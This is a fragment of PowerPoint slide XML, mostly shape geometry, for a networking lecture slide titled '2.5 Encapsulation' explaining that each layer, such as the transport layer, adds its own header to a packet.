                    <a:pt x="977479" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927354" y="772667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128778" y="772667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78652" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37719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1" name="object 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15C33F88-0592-FC32-C861-8E360C172DC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7174554" y="2332027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53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F18B168-B934-1196-4FDF-752CFD253713}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5131505" y="4766534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33" name="object 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D06D8C6F-9E7A-E4F9-5B87-E4E6AEAEEE76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5131505" y="4777180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42</a:t>
            </a:fld>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="object 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9F2D80C-86BC-B84B-DDAE-0AAD96AF001E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4456373" y="3164511"/>
            <a:ext cx="328802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application</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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layer</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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gives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its</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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packet</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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transport </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="252525"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>layer,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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which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adds</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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its</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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own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header.</a:t>
            </a:r>
            <a:endParaRPr sz="240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AAB558-25B8-861D-FA90-4ECD7528817A}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="523800" y="1143000"/>
              <a:ext cx="7363080" cy="151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AAB558-25B8-861D-FA90-4ECD752881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440" y="1133640"/>
                <a:ext cx="7381800" cy="15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917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AA53872-24D9-8405-0803-5DCADF929F62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432714" y="185345"/>
            <a:ext cx="33032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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>5 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2900" b="1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900" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Encapsulation</a:t>
            </a:r>
            <a:endParaRPr sz="2900" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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82BA1041-1854-D887-475D-D61C1374BFC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561696" y="1097078"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="1166621"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="object 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0714A2F5-5683-8C96-941F-D78C8A077C6B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2" name="object 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B62AF146-D5C7-F6D1-76F0-8A3DA7924294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85472F59-990D-9061-B68F-9A7B19362DFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717702" y="1181102"/>
            <a:ext cx="20078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7DEAE7D9-C744-9837-DAAE-3F99D08722C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561696" y="2009955"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="2079498"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="object 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A3A44B9-9FAF-B1CD-B6DD-91FC8C7A6B22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00763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0" name="object 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F378B375-6117-5118-D34E-31AE9F69C17C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8" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01E16B5A-A04D-13A3-1E04-31E865D7C67E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717702" y="2095298"/>
            <a:ext cx="17030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35" dirty="0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9" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA4C8F17-91FC-7C7B-A2B4-56C6D7CD156C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561696" y="2924355"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="2993898"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="object 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3C9FAA6-481F-0CAA-1ECE-A299F7A24F87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8" name="object 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2002AFAF-860E-876E-D738-32FB4CEC9257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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93ABA0DB-769E-A9DD-A6C4-F7A52BAFCEC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717702" y="3008378"/>
            <a:ext cx="15392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1" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE650A60-BFCB-EE0A-AFE6-4B672CA12864}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561696" y="3837231"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="3906774"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="object 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC7FFFED-0607-AAFB-8588-5207FF55F538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8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6928" y="92940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399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92940" y="808411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1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2536628" y="722399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40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2450620" y="6928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6" name="object 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8018751F-82E8-3CFC-3289-B50B31174B56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40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92940" y="6928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8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2536628" y="92940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399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2450620" y="808411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1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6928" y="722399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2" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCB81E7C-6C8D-0CA2-7EF6-9C3A3011686E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717702" y="3922524"/>
            <a:ext cx="16414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3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3" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0310EA3-D267-E4D6-AE90-518D8EA08863}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6264503" y="1247954"/>
            <a:ext cx="864235" cy="774700"/>
            <a:chOff x="6243065" y="1317497"/>
            <a:chExt cx="864235" cy="774700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="object 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE3A494C-2E66-0195-6822-3F757DC1A6BE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735076" y="774191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="10142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4" name="object 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05418A53-940D-33E6-3919-6C015EBC7FE4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2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735076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4" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79FC8959-E90A-7B98-F639-EBE2C461FF86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6404077" y="1492379"/>
            <a:ext cx="554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23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41C20502-741E-062D-AAAE-DCFFBABDFB19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6994499" y="1247954"/>
            <a:ext cx="1056640" cy="774700"/>
            <a:chOff x="6973061" y="1317497"/>
            <a:chExt cx="1056640" cy="774700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="object 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD84B263-9037-1229-AA72-E3FA295935E4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927100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927100" y="774191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="10142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2" name="object 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5128C14-1697-CB4C-D6F5-44B10EC85178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927100" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="10142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927100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6" name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EB5459E-BAF9-03D5-63A6-1B79672B8022}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7136740" y="1492379"/>
            <a:ext cx="5918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27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B0F2FD5-86BD-81DE-815F-B9E351088C55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5568035" y="2087679"/>
            <a:ext cx="864235" cy="772795"/>
            <a:chOff x="5546597" y="2157222"/>
            <a:chExt cx="864235" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="object 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88578507-5BEA-F3C1-524F-A9BDEE2406BD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7" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826388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0" name="object 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6C977C1-1216-A434-EC54-8F07AE518387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8" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107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8" name="object 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B2B80C3-5957-6542-B039-F4250E7CFBF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5706339" y="2332027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31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8A832E9-C95F-F67F-7B5E-335C67F09E37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6296507" y="2087678"/>
            <a:ext cx="1754505" cy="772795"/>
            <a:chOff x="6275069" y="2157221"/>
            <a:chExt cx="1754505" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="object 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{441396D8-220E-77D1-E9DE-5127ECC91F3B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6275069" y="2157221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4">
                  <a:moveTo>
                    <a:pt x="1625346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1625346" y="772667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625346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8" name="object 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89ED019F-682F-BAFA-DE48-5A75BEC6AFB5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6275069" y="2157221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1625346" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625346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0" name="object 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D309F27-EF17-E3B9-9C03-ABB1980835CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6450940" y="2332027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35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6606684C-1EDD-2BF3-96CD-90F5E81BE2C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3225647" y="1286055"/>
            <a:ext cx="576580" cy="3278504"/>
            <a:chOff x="3204209" y="1355598"/>
            <a:chExt cx="576580" cy="3278504"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="object 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33979CF1-8A6F-C3B9-E820-B6D40CD0D1E6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432053" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144017" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144017" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288036" y="3278124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2990088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6" name="object 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55BB4DB4-F227-6E3F-68CE-5EE7C8C3E87D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0" y="2990088"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144017" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144017" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288036" y="3278124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2990088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2" name="object 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03B425CD-709B-0B13-E138-A47F1FBCE12E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3449803" y="1364617"/>
            <a:ext cx="85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39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1C3F9F3-CFD4-4FF4-2DC2-CD292EE4598F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3440659" y="1609142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40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23818CB8-2D17-44B4-EFAE-7B202414AB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3440659" y="1852982"/>
            <a:ext cx="1454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" indent="-1905" algn="just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w e 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41">
            <a:extLst>
